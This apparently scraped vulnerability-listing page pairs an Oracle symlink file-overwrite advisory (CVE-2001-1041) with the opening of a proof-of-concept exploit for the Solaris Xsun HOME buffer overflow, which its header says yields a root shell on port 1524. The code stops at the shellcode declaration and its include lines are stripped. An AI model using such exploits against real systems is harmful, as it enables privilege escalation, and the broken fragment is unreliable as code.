CVE-2001-1041: oracle program in Oracle 8.0.x, 8.1.x and 9.0.1 allows local users to overwrite arbitrary files via a symlink attack on an Oracle log trace (.trc) file that is…

CVE-2001-1041 [LOW] GHSA-9vgr-jp8f-r9m7: oracle program in Oracle 8 oracle program in Oracle 8.0.x, 8.1.x and 9.0.1 allows local users to overwrite arbitrary files via a symlink attack on an Oracle log trace (.trc) file that is created in an alternate home directory identified by the ORACLE_HOME environment variable.

CVE-2001-0422 Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow --- // source: https://www.securityfocus.com/bid/2561/info The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability. The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long). An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges. /***********************************/ Solaris 7 (x86) /usr/openwin/bin/Xsun HOME environment overflow Proof of Concept Exploitation [email protected] Puts a Root shell on local port 1524 /***********************************/ #include #include #include #include #define BUFLEN 1041 /* seteuid/setuid/inetd shell */ char eyecode[]